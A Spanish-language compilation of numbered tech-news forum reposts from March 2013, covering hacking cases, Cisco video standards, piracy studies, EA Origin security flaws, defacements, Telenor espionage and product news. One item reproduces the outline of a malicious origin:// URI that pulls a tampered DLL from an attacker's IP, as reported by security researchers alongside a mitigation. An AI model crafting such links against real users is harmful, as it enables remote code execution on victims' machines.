El informático de 27 años, uno de los miembros de Goatse Security -el grupo que descubrió el fallo de seguridad de AT&T que reveló datos privados de miles de usuarios de iPad en Estados Unidos- fue declarado culpable por un jurado en noviembre del pasado año en Newark, New Jersey, por conspiración para acceder a los servidores del operador sin permiso y por robo de identidades. La sentencia ha sido impuesta por la juez de distrito Susan Wigenton. Los fiscales sostienen que una pena efectiva de prisión podría ayudar a disuadir a los futuros 'piratas' de modo que eviten las invasiones en la privacidad de los usuarios de internet. Entre los afectados por las actividades de Auernheimer se encuentran la estrella de la ABC New, Diane Sawyer; el alcalde de Nueva York, Michael Bloomberg; el alcalde de Chicago, Rahm Emanuel y el productor de cine de Hollywood Harvey Weinstein.

"Cuando se hizo evidente que estaba metido en un serio problema, se inventó la ficción de que estaba tratando de hacer que Internet fuera más seguro, y que lo único que hizo fue cruzar una puerta abierta", dijo el fiscal Paul Fishman en un comunicado. "El jurado no le creyó, y tampoco lo hizo el corte ahora que le ha impuesto una condena". Auernheimer había solicitado la libertad condicional. Su abogado, Tor Ekeland, argumentó que no 'hackeó' contraseñas, y además no estaba justificada una pena de cárcel tan larga ya que existen casos similares recientes en los que la pena se limitó a seis meses de prisión por "hechos mucho más intrusivos" El abogado ya ha confirmado que su cliente apelaría.

Ekeland es también abogado de Matthew Keys, un responsable de medios sociales de Thomson Reuters Corp quien fue suspendido el viernes. Keys fue acusado la semana pasada en California por ayudar al colectivo 'hacker' Anonymous, a cuyos miembros dio acceso a los sistemas informáticos del grupo 'Tribune Co' en diciembre de 2010. Los hechos denunciados ocurrieron antes de que Keys comenzara a trabajar en Reuters.com. Ekeland dijo el viernes pasado que el acusado "mantiene su inocencia" y "espera poder tumbar estos cargos sin fundamento".

FUENTE :http://www.laflecha.net/canales/blackhats/noticias/condenan-a-mas-de-tres-anos-de-carcel-al-informatico-que-hackeo-los-servidores-de-at-t-en-2010
#33814
Hay tres nuevas tecnologías que cambiarán profundamente la naturaleza del vídeo durante los próximos años con un notable impacto en el mercado de la colaboración, según Cisco.

La primera de estas tecnologías es la nueva norma de compresión de vídeo High Efficiency Video Codec (HEVC) o H.265. Recién ratificada por ISO e ITU, H.265 aparecerá en el mercado durante los dos próximos dos años proporcionando una eficiencia de compresión dos veces superior a la de su antecesor H.264. Es decir, con el mismo consumo de ancho de banda permite transmitir el doble de vídeo o el mismo con el doble de calidad.

Para Cisco, estas características de H.265 tendrán un gran impacto en el vídeo móvil, porque incluso con la llegada de LTE, los operadores están restringiendo el ancho de banda por su alto coste. "En 2012 por primera vez la mitad del ancho de banda móvil fue consumido por el vídeo, y esa tasa será del 70% en 2017. Y es de imaginar que, al duplicar la eficiencia de su transmisión, podremos ver más experiencias de vídeo de alta definición (HD) en los dispositivos móviles", afirma Kip Compton, CTO de colaboración y vídeo de Cisco Systems.

La segunda tecnología es la llamada Alter-HD, o también 4K (en relación al número de líneas de resolución), que ofrece una mayor definición que HD, "de una forma no muy distinta a lo que Apple ha hecho con sus pantallas Retina, pero incluso con mayor resolución y con mejor soporte de pantallas de mayor tamaño", asegura Campton.

Alter-HD proporciona un número de pixels cuatro veces superior en cada dirección que HD, "redefiniendo lo que significa una experiencia inmersiva desde la perspectiva del vídeo, con grandes implicaciones en los productos de telepresencia", según Compton.

La tercera tecnología es WebRTC (Web Real-Time Communication), un estándar que procede no del mundo de la resolución ni de los codecs de vídeo, sino del mundo web. Actualmente en fase de borrador en el seno de W3C y el IETF, WebRTC hace posible convertir los navegadores de cualquier dispositivo fijo o móvil en un cliente de videoconferencia HD. Además, la experiencia de videoconferencia puede ser embebida en una página web o app HTML5. "Un ejemplo obvio de uso de WebRTC sería el uso del chat de vídeo para desde la web hablar con un experto en un producto para conocer más detalles o con un comercial para completar un pedido", afirma Compton

Para Cisco, el vídeo es una de sus principales prioridades para los próximos cinco años. De hecho, la compañía espera que el uso de la videoconferencia IP de empresa se multiplique por seis hasta 2016, con un crecimiento dos veces mayor que el del tráfico IP corporativo a un ritmo compuesto anual del 42%.

FUENTE :http://www.networkworld.es/Tres-nuevas-tecnologias-que-transformaran-el-video/sección-actualidad/noticia-131458
#33815
Un nuevo estudio del Joint Research Centre de la Comisión Europea viene a decir que la llamada 'piratería' digital de música no afecta de manera negativa a los ingresos por la venta de música digital.

Se trata de una conclusión que, aunque no es nueva, choca con los últimos datos que la industria cultural esgrime para pedir un endurecimiento de las medidas contra las descargas no autorizadas de contenidos.

Este informe, realizado sobre los hábitos de navegación de 16.000 ciudadanos de Reino Unido, Francia, Alemania, Italia y España, ve una relación positiva entre la 'piratería' en línea y las visitas a las tiendas de música legal, y concluye que la industria de la música "no debe ver la 'piratería' como una preocupación creciente", informa TorentFreak.

El estudio ha sido realizado por el Instituto de Prospectiva Tecnológica, con sede en Sevilla, que forma parte del Joint Research Centre de la Comisión Europea, y mide la relación entre las visitas a sitios de descarga de mñusica no autorizados frente a opciones de pago, o bien de música en 'streaming' con autorización. Los resultados apuntan a que existe una relación directa: a más visitas a sitios copnsiderados 'ilegales', más visitas a sitios 'legales'.

El artículo que resume el informe concluye que la mayoría de la música que se consume 'ilícitamente' por los individuos de la muestra no habrían sido compradas si los situios 'ilegales' no hubieran estado disponibles. Además, los investigadores consideran que los sitios web de 'streaming' gratis y 'legal' no canibalizan las compras legales de música, y de hecho parecen estimular dichas compras.

No obstante, recuerda el Blog Salmón que "existen diferencias significativas entre los países" . "En España e Italia, por ejemplo, el número de 'clicks' en páginas de descarga gratuita de música fueron mucho mayores que en el resto de países", apunta, y añade: "En 'clicks' a páginas legales de contenidos, España fue segunda por la cola, sólo superada por Italia". ¿Es una cuestión de oferta?

El estudio ha suscitado la reacción de expertos como el profesor del Instituto de Empresa Enrique Dans, quien en un post en su blog sostiene que si en España se descarga más desde sitios no autorizados o ilícitos es, "sencillamente, porque la oferta que la industria permite es un desastre: incompleta, cara, incómoda y respaldada por una panda de energúmenos vociferantes e insultantes que inspiran cualquier cosa menos el consumo de sus productos".

FUENTE :http://www.elmundo.es/elmundo/2013/03/19/navegante/1363695074.html
#33816
Muchas veces hemos hablado de que los ataques están muy optimizados a día de hoy y que se basan sobre todo en la ingeniería social. Pero en otras ocasiones, la ingeniería social ya ha hecho su trabajo y el atacante sólo tiene que hacer su trabajo. Es el caso de la plataforma de juego en línea EA Origin ya que los problemas de seguridad que tienen, podrían permitir realizar un ataque a todos los usuarios de la plataforma sin que estos lo sepan.

Y es que este tipo de plataformas en las que los usuarios pueden comprar contenidos, interactuar con otros usuarios y tener acceso a información sobre los juegos que deseen, podrían convertirse en el próximo blanco de los cibercriminales. Uno de los motivos es muy sencillo, la gran cantidad de usuarios que disponen utilizando la base de datos del servicio. El otro motivo es que no tendrían que llevar a cabo ningún tipo de ingeniería social, ya que si el usuario se encuentra en el servicio, es porque confía plenamente en los contenidos de este.

Funcionamiento de estos servicios

Para todos aquellos que sean tan jugones o que no hayan pensado en utilizar nunca un servicio de estas características, el funcionamiento que tienen, en esta caso EA Origin, es el siguiente: El usuario dispone de un cliente de escritorio instalado en el PC, este posee a su vez todos los juegos que han sido adquiridos por el usuarios. Cuando el usuario desea iniciar un juego, este realiza una llamada a la web de Origin. En ese momento el juego "se muere", es decir, acaba el proceso, y al poco tiempo (un segundo o dos) el usuario posee la validación de EA Origin y el juego se inicia.

Esto que como podéis ver resulta muy cómodo, tiene serios problemas de seguridad que podrían ser utilizados contra el usuario.

¿Cómo se llevaría a cabo el ataque?

De una forma muy sencilla: utilizando la URL. El sistema de confirmación y verificación de EA Origin trabaja con URLs compuestas de varios campos. Estos campos, además de tener el GameID enviado por el usuario al ejecutar el juego, también tienen una parte que son instrucciones o comandos que son ejecutados para arrancar el juegos y que generalmente hacen referencia a librerías DLL, si hablamos de Windows.

http://www.redeszone.net/wp-content/uploads/2013/03/EA-Origin-problema-seguridad.png

Para poder llevar a cabo esto sólo hace falta acceder al gestor de direcciones URL del servicio y sustituir los comandos por direcciones URL de descarga de archivos maliciosos. Otro caso que puede darse es en el que la conversación del usuario podría ser interceptada y podría ser desviada a un servidor externo a EA Origin. la petición sería afectada, pero el usuario recibiría una URL con contenido maligno o algún comando que podría llevar a cabo la exposición de datos personales del usuario.

http://vimeo.com/61361586

Fuente | The Hacker News

LEIDO EN :http://www.redeszone.net/2013/03/19/fallos-de-seguridad-en-ea-origin-podrian-causar-problemas-a-los-usuarios/
#33817
Una nueva app, nacida de la colaboración de Samsung Apps y Antena 3 permite grabar una narración personalizada y forma parte de una serie inspirada en los clásicos de la literatura.

Las aventuras de Don Quijote llegan así a smartphones y tabletas Android, a través de este desarrollo que cuenta con narraciones en inglés y español realizadas por actores profesionales y está acompañada de ilustraciones y música original sincronizada con el ambiente de cada escena. Se trata de una aplicación con carácter educativo para que los usuarios revivan las historias de sus protagonistas mediante acertijos, juegos y sorpresas. De este modo, las caballerescas historias del ingenioso hidalgo se hacen interactivas y se adaptan a los nuevos soportes digitales.

Una de las funcionalidades es que el usuario puede grabar su propia narración, así como interactuar con los personajes y con algunos elementos de la novela. El desarrollo ha sido posible gracias a Touch of Classic, que se encarga de dar vida a la literatura clásica y universal de forma interactiva. Para ello, se han diseñado ilustraciones originales y música inédita.
Según afirma Miguel Ángel Ruiz, responsable de Contenidos Digitales de Samsung Electronics 'Es muy importante para nosotros crear aplicaciones como esta que, inspirada en uno de los grandes clásicos de la literatura universal como El Quijote, puedan acercar a los más pequeños parte de la cultura universal de una forma interactiva y divertida'.

PROMOCIÓN
Esta aplicación estará disponible en Samsung Apps para smartphones y tabletas de modo gratuito hasta el próximo 27 de marzo.

FUENTE :http://www.elperiodico.com/es/noticias/tecnologia/don-quijote-hace-interactivo-2344504
#33818
Ya hemos visto cómo el depender de servicios de terceros nos deja a merced de lo que las compañías quieran hacer con ellos, y lo que acaba de ocurrir con Rapidshare es una muestra más. La popular compañía de alojamiento de archivos acaba de anunciar sus nuevos planes de pago, bastante distintos a los actuales, y quiere obligar a que sus usuarios decidan qué hacer y qué plan escoger antes de mañana día 20 de marzo. Así de repentino.

Por ejemplo, las actuales cuentas gratuitas que disponían de alojamiento de archivos ilimitado, pasarán a tener un límite de 5GB a partir de mañana día 20 de marzo. ¿Y qué ocurre con los que actualmente ya superan esa cifra? Pues que o borran archivos o Rapidshare lo hará por ellos. La empresa da de plazo hasta el día 3 de abril, cuando el borrado será efectivo.

Seguir leyendo : http://www.genbeta.com/almacenamiento/rapidshare-borrara-parte-de-los-archivos-de-los-usuarios-gratuitos-que-superen-5gb
#33819
Flattr es la startup que Peter Sunde (ex Pirate Bay) y Linus Olsson crearon hace ya unos años. Una especie de bote de propinas que artistas y desarrolladores pueden incluir en sus páginas web para que los usuarios que lo deseen aporten fondos.

Esta funcionalidad, que nunca ha llegado a cuajar, va a ser sustituida próximamente por un nuevo sistema de propinas. ¿Cómo? monetizando los "Me gusta" en redes sociales como Instagram, SoundCloud, 500px o Vimeo y también los favoritos de Twitter.

Los usuarios que lo deseen pueden crear una cuenta en Flattr y añadir la cantidad de dinero que deseen. Una vez asociadas nuestras cuentas en las plataformas mencionadas anteriormente, cuando le demos a "Me gusta" en cualquiera de las redes sociales estaremos contribuyendo con nuestros fondos, como si de una donación se tratase.

Al final de mes, el dinero que hemos aportado en primera instancia será repartido entre todas las partes que nos han gustado, quedándose Flattr con un 10% de la cantidad total. Aunque en principio pueda parecer una idea interesante para que los usuarios valoren el trabajo de artistas o productores, el principal problema que presenta este nuevo sistema es que dichos artistas (o los receptores del dinero) tienen que estar dados de alta con Flattr para que se pueda producir el reparto de dinero.

Es decir, que no por marcar cualquier tweet como favorito o darle a me gusta en un post de Facebook estaremos contribuyendo monetariamente. Este nuevo sistema creado por Flattr es muy interesante y supone una nueva forma de valorar el trabajo de otros, pero la forma de implementarlo quizás sea demasiado compleja para el público en general.

Vía | GigaOm

FUENTE :http://www.genbeta.com/redes-sociales/flattr-monetiza-tus-me-gusta-y-favoritos
#33820
Los hackers del grupo Moroccan Ghosts han desfigurado 152 sitios web españoles en respuesta a la decisión de un juez, según la cual el Servicio de Guardacostas español no es responsable por la muerte de 7 marroquíes que fallecieron intentando llegar a España en un pequeño bote.

http://news.softpedia.com/images/news-700/152-Spanish-Websites-Hacked-in-Protest-Against-the-Deaths-of-7-Moroccan-Immigrants.png

En respuesta a la sentencia, los hacktivistas han alterado los sitios web españoles para mostrar su mensaje de protesta, informa HackRead.

"¿Quién puede creer vuestras mentiras? ¿O quién 'debería' aceptar este divertido espectáculo? La Guardia Civil española es el único responsable por la muerte de 7 inmigrantes marroquíes en las Islas Canarias... por lo tanto, alejaos de los intereses políticos y repetid el juicio de esos animales."

En el momento de escribir esto, la mayoría de los sitios web habían sido desconectados, pero algunos de ellos todavía mostraban el mensaje de protesta publicado por los hackers.

Mientras tanto, Moroccan Ghosts han anunciado que están tomando un descanso de la escena de hacking durante unas semanas.

FUENTE : http://news.softpedia.es/152-sitios-web-espanoles-han-sido-hackeados-para-protestar-por-la-muerte-de-7-inmigrantes-marroquies-338163.html
#33821
La empresa de telecomunicaciones noruega Telenor es la última gran organización que informa haber sido afectada por un sofisticado ataque cibernético.

Según Views and News from Norway, los ciberdelincuentes pueden haber robado cantidades impresionantes de información de los ordenadores personales de los ejecutivos de Telenor.

Los representantes de la empresa informan que el ataque ha sido detectado rápidamente y se han tomado medidas adicionales para prevenir los futuros incidentes. Sin embargo, puesto que los efectos de la penetración en los sistemas de la organización podrían ser graves, Telenor ha presentado una queja ante la Policía.

El incidente comenzó con correos electrónicos inteligentemente diseñados enviados a los ejecutivos de la empresa. Los mensajes parecían provenir de contactos de confianza, incluyendo individuos de dentro de la empresa.

Los archivos adjuntos a esos correos escondían sofisticadas piezas de malware que no fueron detectados por las soluciones de seguridad.

Una vez que los Troyanos eran descargados en los ordenadores, comenzaban a recopilar correos electrónicos, contraseñas, varios tipos de archivos y datos personales.

"Está totalmente claro que las personas detrás (del ataque) fueron capaces de descargar información. No cabe duda que hemos perdido datos", dijo Rune Dyrlie, director de seguridad de Telenor, en una declaración para Aftenposten.

No está claro qué están buscando los atacantes, pero Dyrlie destaca el hecho de que los ciberdelincuentes suelen copiar grandes cantidades de datos en un intento de ocultar lo que realmente quieren obtener.

Los ataques fueron descubiertos cuando los sistemas de monitoreo de la empresa elevaron algunas banderas rojas sobre el tráfico anormal entre los ordenadores de los ejecutivos de Telenor y direcciones IP desconocidas asociadas con dispositivos de varios países.

Por el momento, los representantes de Telenor no han nombrado a ningún sospechoso. Sin embargo, Dyrlie dice que los culpables parecen tener "recursos masivos y muchísima competencia".

A principios de este mes, unos funcionarios noruegos revelaron que al menos 20 ataques cibernéticos sofisticados, aparentemente originados en China, fueron lanzados contra organizaciones de alto perfil.

FUENTE :http://news.softpedia.es/El-gigante-de-telecomunicaciones-noruego-Telenor-ha-sido-victima-de-una-campana-de-espionaje-cibernetico-338176.html
#33822
La Administración de Servicios Generales (GSA) de EEUU informa que un grave agujero de seguridad ha sido descubierto en la base de datos del System of Award Management (SAM). La vulnerabilidad podría haber sido explotada para obtener acceso a la información de registro de ciertos usuarios.

El agujero de seguridad, que expone detalles personales y financieros, fue identificado el 8 de marzo y fue parcheado el 10 de marzo.

"Inmediatamente después de que se identificó la vulnerabilidad, GSA implementó un parche de software para cerrar esta exposición. En este momento, GSA está llevando a cabo una revisión completa del sistema y está investigando cualquier impacto adicional sobre los solicitantes de registro de SAM", escribió GSA en una sección de preguntas frecuentes.

Parece que los usuarios más vulnerables son aquellos que utilizaron sus números de seguro social (SSNs) como Número de Identificación del Contribuyente y optaron para la búsqueda pública.

Estos usuarios serán contactados por separado y recibirán acceso a servicios de monitoreo del crédito.

Nextgov informa que alrededor de 600.000 usuarios están registrados a SAM.

FUENTE :http://news.softpedia.es/La-Administracion-de-Servicios-Generales-de-EEUU-parchea-un-fallo-que-exponia-los-datos-privados-de-los-usuarios-338243.html
#33823
Noticias / Cuando lo privado se hace público
19 Marzo 2013, 01:50 AM
Un vídeo formado por 10.000 fotos anónimas de jóvenes de todo el mundo, robadas a sus dueños con un programa informático que aprovecha los fallos de seguridad de sus ordenadores, se proyecta en una sala del Sheila C. Johnson Design Center, un espacio expositivo del Parsons The New School for Design de Nueva York. Ninguno de los retratados tiene conciencia de formar parte de una obra de arte titulada The Others que, hasta el 17 de abril, se exhibe en la exposición The Public Private, comisariada por Christiane Paul, profesora de The New School y comisario adjunto de New Media Arts en el Whitney Museum de Nueva York.

The Others es la última provocación de Eva y Franco Mattes, una pareja de artistas y hacktivistas italianos que desarrollan sus trabajos en el ámbito del media art y las nuevas tecnologías, conocidos en todo el mundo bajo el seudónimo de 0100101110101101.ORG. Su polémica presencia en la exposición responde a las motivaciones de una selección de obras que se propone reflexionar sobre el impacto de las nuevas tecnologías y las redes sociales en relación al significado de espacio público y privado.

Las piezas seleccionadas se presentan por primera vez en los Estados Unidos, pero en su mayoría se pueden experimentar también desde un simple ordenador doméstico. "Su esfera conceptual pone en entredicho los significados de legalidad y privacidad, mediante el uso de estrategias que van desde las prácticas de hacking hasta los sistemas de vigilancias para reflexionar sobre los profundos cambios en la percepción de la identidad", explica Christiane Paul.

LEER MAS : http://blogs.elpais.com/arte-en-la-edad-silicio/2013/03/cuando-lo-privado-se-hace-publico.html
#33824
Noticias / Las mejores páginas de error 404
19 Marzo 2013, 01:32 AM
En varias ocasiones hemos señalado que cuando un usuario navegando por un site escribe incorrectamente una URL o trata de acceder a un recurso que ya no existe acaba y va a parar al ya conocido página no encontrada. Esta situación bastante habitual, ¿quién no ha ido a parar alguna vez a una página de error 404? debe tratarse con la máximo cuidado por parte de los desarrolladores responsables de una web ya que es uno de los factores más importantes en el aumento de la tasa de rebote y abandono de nuesto site.

Para combatir la incomodidad que sufre un usuario que no ha logrado encontrar aquello que busca podemos darle un contenido extra con el que no solo rebajar dicha frustación sino ofrecer una opción para que siga navegando por el sitio.

En este sentido hoy queremos traeros una recopilación de las mejores páginas de error 404 con multiples diseños y temáticas con la que encontrar aquellas que se ajuste mejor a nuestras necesidades y estilo así como a los de nuestro site.

De la mano de Pinterest hoy traemos esta colección de recursos gratuitos con los que seguir dando valor añadido a nuestro site al mismo tiempo que mejoramos el número de visitas. Interesados pueden acceder desde pinterest.com http://pinterest.com/producermatthew/best-404-pages/

FUENTE :http://www.laflecha.net/canales/blackhats/noticias/las-mejores-paginas-de-error-404
#33825
Se ha publicado un estudio que revela la posibilidad de ejecutar código remoto a través de la plataforma de juegos Origin, afectando a más de los 40 millones de usuarios que acceden regularmente a sus juegos (como Crysis 3, Simcity, Battlefield...).

Los investigadores Luigi Auriemma y Donato Ferrante de la firma ReVuln, que ya alertaron de una vulnerabilidad similar en Steam en noviembre de 2012, han realizado el mismo análisis en la plataforma de Electronics Arts y han encontrado una vulnerabilidad equivalente. Según sus investigaciones un atacante remoto podría ejecutar código malicioso a través de enlaces origin:// especialmente manipulados.

Básicamente la plataforma Origin utiliza el siguiente protocolo para iniciar y comprobar la validez de un juego:

    Inicio del ejecutable del juego que invoca a la plataforma Origin instalada en el sistema, mediante un URI personalizado al efecto "origin://"

    Cierre del proceso del juego.

    La plataforma Origin una vez hechas las comprobaciones DRM que indican que el juego es original, lo lanza a través del mismo URI inicial suministrado.

Este URI "origin://" como tal es accesible a través de cualquier acceso directo del sistema o desde el navegador, por lo que un atacante sólo tendría que incluir un URI malicioso en su página web, o en un correo y distribuirlo.

Los investigadores comentan que existen diferentes maneras de conseguir que se ejecute el código. En su comunicado se centran en la función OpenAutomate que permite iniciar un test de comprobación del sistema.

Una URI maliciosa utilizando este comando sería la siguiente:

origin:// comando /< ID del juego>?CommandParams = openautomate\\< IP del atacante >\\ openautomate.dll

Donde ID es el identificador del juego instalado en el sistema y openautomate.dll la librería especialmente modificada que, aparte de ejecutar el juego, inicia el código malicioso desde la IP del atacante.

El ID del juego no es particular para cada usuario, por lo que es trivial incluir en una llamada un conjunto de IDs de juegos vulnerables por 'openautomate' para explotar la vulnerabilidad, aunque no se conozca a priori qué juego del catálogo mantiene el usuario instalado en su sistema.

En este vídeo se puede ver el proceso completo y la demostración de la vulnerabilidad: http://vimeo.com/61361586

Como solución temporal, se indica la posibilidad de desactivar o bloquear el protocolo "origin://" en el sistema y en el navegador, por lo que sólo se podría iniciar el juego desde la plataforma Origin directamente, hasta que se solucione la vulnerabilidad.

Más información:

EA Origin Insecurity (when local bugs go remote... again) http://revuln.com/files/ReVuln_EA_Origin_Insecurity.pdf

FUENTE :http://www.laflecha.net/canales/seguridad/noticias/ejecucion-remota-de-codigo-en-la-plataforma-de-juegos-origin
#33826
Zattoo fue uno de los programas pioneros en emitir los canales de TV españoles a través de internet. En un principio era un servicio gratuito aunque en agosto de 2008 empezó a ser un servicio de pago impidiendo a los usuarios free ver la TV y añadiendo a los usuarios premium la posibilidad de visualizar los canales en HD. En diciembre de 2012 volvió a ser un servicio gratuito en su versión no HD aunque la versión HD y la versión para móviles sigue siendo de pago.

Zattoo ha añadido nuevas e interesantes novedades a su servicio entre las que destaca la posibilidad de grabar canales y almacenarlos en la nube sin la necesidad de tener que estar viendo el canal en ese momento. Dependiendo del tipo de pago podremos disponer de más o menos espacio de almacenamiento.

LEER MAS : http://www.redeszone.net/2013/03/18/zattoo-como-ver-la-tv-a-traves-de-internet-y-grabar-los-canales-en-la-nube/
#33827
De preferencia, los cantantes deberían saber cantar, pero en la era de las redes sociales la popularidad ya no depende de algo tan elemental.

Diario TI 18/03/13 12:31:23

Según un reportaje publicado hoy por BBC Newsbeat, actualmente es normal comprar tráfico en Internet; específicamente en YouTube, Facebook y Twitter.

De hecho, el número de seguidores en YouTube se ha transformado en un criterio oficial en la prestigiosa lista estadounidense Billboard.

En realidad, la manipulación de listas de hits musicales no es novedad. Desde la década de 1960 se han denunciado manipulaciones en la industria de la música. En ese entonces, los sellos discográficos pagaban a jóvenes por adquirir un gran número de singles, con el fin de que sus intérpretes ganaran popularidad en las listas de venta.

La situación actual observada en las redes sociales constituiría la versión moderna de tal manipulación.

Según las fuentes consultadas por la BBC, actualmente tiene un valor cercano a los 3000 USD comprar 1 millón de visitas a una cuenta de YouTube. Indudablemente, un importe modesto para un sello discográfico, pero quizás un reto mayor para un artista emergente. En tal caso, la solución puede ser comprar 10.000 visitas por 50 USD.

Consultados por BBC, representantes de Facebook y YouTube dijeron estar al tanto de la situación, recalcando que indudablemente infringe sus reglas de uso. El portavoz de Facebook declaró además que todos los "me gusta" fraudulentos son borrados por un sistema de detección automática.

YouTube por su parte dice tener una política incluso más estricta frente a situaciones de popularidad fraudulenta. En tales casos, las reglas de uso facultaban a la empresa para clausurar definitivamente una cuenta que está siendo manipulada.

Finalmente, un representante de Twitter recalcó que utilizar una empresa o un programa informático para incrementar la actividad online Twitter infringe las reglas de la empresa que "se reserva el derecho de eliminar automáticamente las cuentas de los infractores".

FUENTE :http://diarioti.com/denuncian-que-artistas-pagan-por-popularidad-en-facebook-twitter-y-youtube/62298
#33828
El colectivo de hackers Anonymous  dijo este domingo, en su cuenta de Twitter, haber atacado la web del departamento de Justicia de Estados Unidos, (http://www.justice.gov/), en un ataque que puede suponer una represalia por el suicidio del ciberactivista Aaron Swartz.

En efecto, la web del departamento de justicia permaneció fuera del aire' durante al menos una hora y media, desde aproximadamente las dos de la madrugada de este lunes, y el colectivo hacker asegura además haber 'tumbado' la web del organismo Mercosur, (http://mercosur.int/).

El pasado 26 de enero, un grupo de hackers de este colectivo aseguraban haber atacado la página web de la Comisión de Sentencias del Departamento de Justicia de Estados Unidos como respuesta a la muerte del ciberactivista Aaron Swartz. Dicha web es la responsable de emitir las pautas de sentencia de los tribunales federales de EE UU.

"Hace dos semanas, Aaron Swartz fue asesinado. Asesinado porque se enfrentaba a una elección imposible. Asesinado porque fue obligado a jugar un juego que no podía ganar", seguraron entonces los hackers en un vídeocomunicado.

Swartz, de 26 años, iba a ser juzgado por utilizar la red del Instituto Tecnológico de Massachusetts (MIT) para robar más de 4 millones de artículos del JSTOR, un archivo online y servicio de distribución de periódicos. De haber sido declarado culpable el ciberactivista se habría enfrentado a una pena de hasta 35 años de prisión y a una multa de hasta un millón de dólares (742.850 euros)

La agencia hackeada es la responsable de emitir las pautas de sentencia de los tribunales federales de Estados Unidos. Los piratas informáticos, que bautizaron el ataque como operación Last Resort, eligieron la web por "motivos simbólicos".

"Las directrices de sentencias federales (...) permiten que los fiscales engañen a los ciudadanos sobre su derecho constitucionalmente garantizado a un juicio justo (...) y son una clara violación de la octava enmienda contra los castigos crueles e inusuales", explicaban en el vídeo. El comunicado también sugiere que los hackers poseen información delicada sobre algunos jueces estadounidenses que podría ver la luz.

"Cuestión penal"

El subdirector ejecutivo de la Subdivisión de Servicios de Respuesta Criminal y Cibernética delFBI, Richard McFeely, confirmó que la agencia está investigando el ataque.

"Fuimos conscientes (del ataque) en cuanto ocurrió y lo estamos manejando como una investigación penal", declaraba McFeely. "Es competencia nuestra siempre que alguien accede de forma ilegal a la red de otra persona o de una agencia gubernamental".

FUENTE :http://www.20minutos.es/noticia/1761718/0/anonymous-tumba/web-departamento/justicia-ee-uu/
#33829
Publicado el 18 de marzo de 2013 por Antonio Rentero

Zuckerberg se preocupa tanto por ti que no quiere molestarte con avisos sobre las nuevas modificaciones de la aplicación de su red social, desarrollando lo que denominan "actualizaciones silenciosas".

En cierto modo se trata de un método para soslayar el control de Google Play sobre el usuario puesto que una vez instalada la app de Facebook las futuras actualizaciones nos llegarían a la propia aplicación, en lugar de como ahora que recibimos una notificación en el dispositivo que nos indica que está disponible en GooglePlay dicha actualización.

En su lugar la actualización se autoejecutaría cuando detectase una conexión WiFi directamente desde la propia app de Facebook. La única pega que han detectado los usuarios que hasta ahora han podido acceder a la versión en pruebas de este sistema es que los avisos en la app de Facebook son bastante persistentes y no desaparecen hasta que la actualización está instalada.

Con este sistema Facebook quiere garantizar que el usuario tendrá siempre la mejor versión de la aplicación, lo que sucederá al activar la opción que incorpora la última versión en la que se acepta la descarga de archivos sin previa notificación, un método que ya emplean algunas otras aplicaciones como la versión de escritorio de Chrome con gran éxito.

vINQulo

Inside Facebook

FUENTE :http://www.theinquirer.es/2013/03/18/facebook-quiere-que-no-te-preocupes-por-las-actualizaciones-de-su-app.html
#33830
Pese a llevar más de dos años entre nosotros, muchos son los usuarios que no han actualizado a Windows 7 SP1. Este Service Pack 1 tiene un tamaño de 1.9 GB y llevará más tiempo que las anteriores actualizaciones del sistema operativo. Debido al peso del SP1 para Windows 7, los chicos de Redmond aconsejan a los usuarios verificar si se tiene espacio suficiente en el disco duro. La actualización se producirá de forma automática a través de Windows Update (si se tiene activa) a partir de mañana.

Si por algún motivo algunos de los "rezagados" usuarios de Windows  7 no quieren actualizar al Service Pack 1, Microsoft recuerda que el 9 de Abril de 2013, ya no se ofrecerá soporte para sistemas que no tengan dicha actualización.

Windows 7 SP1 contiene muchas mejoras en seguridad e infinidad de correcciones de errores, así que no hay en principio un motivo para rechazar esta actualización, pese a que sea "impuesta" por los chicos del gigante de Redmond. Es más, lo extraño es que Microsoft no haya tomado esta decisión antes, ya que sin duda se trata de un beneficio para los usuarios de su exitoso sistema operativo.

Cabe también comentar, que los sistemas que son administrados por una herramienta de gestión de Microsoft, como System Center Configuration Manager (SCCM) o el servidor WSUS,  no recibirán la actualización de forma automática pudiendo anular la instalación del SP1.

Windows 7 fue lanzado a la venta al público general el 22 de Octubre de 2009 y su primera gran actualización, el Service Pack 1 vió la luz el 9 de Febrero de 2011.  Con una gran acogida por parte del público y de la crítica, actualmente es el sistema operativo más utilizado en el mundo. El 26 de Octubre el año pasado Microsoft lanzó su sucesor, Windows 8.

Fuente: SlashGear

LEIDO EN :http://www.softzone.es/2013/03/18/microsoft-actualizara-a-windows-7-sp1-automaticamente-a-partir-de-manana/
#33831
Publicado el 18 de marzo de 2013 por Antonio Rentero

Podríamos estar cerca del fin de esta tecnología debido a los planes de la compañía japonesa, una de las pocas que continúan fabricando pantallas de plasma, de abandonar dicha tecnología a medio plazo.

Panasonic está planificando su futuro y una de las opciones que valora con más convencimiento es la de abandonar el negocio de la fabricación de televisores de plasma de aquí a tres años.

Ultimamente la compañía ha ido vendiendo parte de las participaciones en otros sectores que mantiene su estructura empresarial, como en el negocio inmobiliario, a fin de reforzar su posición financiera en estos difíciles momentos.

El negocio de la fabricación de televisores reporta a Panasonic unos ingresos superiores a los 8.000 millones de euros en los ejercicios 2009/2010 y según sus propias estimaciones esa cantidad se reduciría a la mitad en los años 2015/2016.

Desde la empresa nipona no aclaran qué decisión tomarán aunque parece lógico que el mercado para este tipo de dispositivos está siendo superado por otros como los LCD y OLED. Lo cierto es que ya habían decidido en Panasonic finalizar la producción de paneles de plasma en su factoría de Anagaskai en torno a 2014, con lo que ahora podría adelantarse esta decisión. De hecho lo que sí ha terminado ya es el desarrollo de nuevos modelos de pantallas de plasma por parte de Panasonic al considerar que resultaría ineficiente mantener en paralelo el desarrollo de modelos de plasma y de LCD, especialmente en Japón donde se está reduciendo el mercado de televisores planos.

vINQulo

Reuters

FUENTE :http://www.theinquirer.es/2013/03/18/panasonic-podria-dejar-de-fabricar-televisores-de-plasma.html
#33832
El Servicio Federal Penitenciario (FSIN, por sus siglas en ruso) de Rusia puso en funcionamiento una aplicación para telefonía móvil que permite a familiares y amigos enviar mensajes de texto a los presos a través de dispositivos portátiles.

La aplicación llamada la carta FSIN http://www.fsin-pismo.ru/Letter-Client/main.html#new_letter permite escribir correos desde iPhones o smartphones con sistemas operativos Android y enviarlo al destinatario que cumpla su pena en una de las prisiones indicadas en la lista del menú del programa.

Sin embargo, el mensaje llega primero al censor de la cárcel y luego, si es aprobado, es entregado al destinatario una vez impreso en papel, toda vez que las leyes rusas no permiten a los presos disponer de teléfonos móviles.

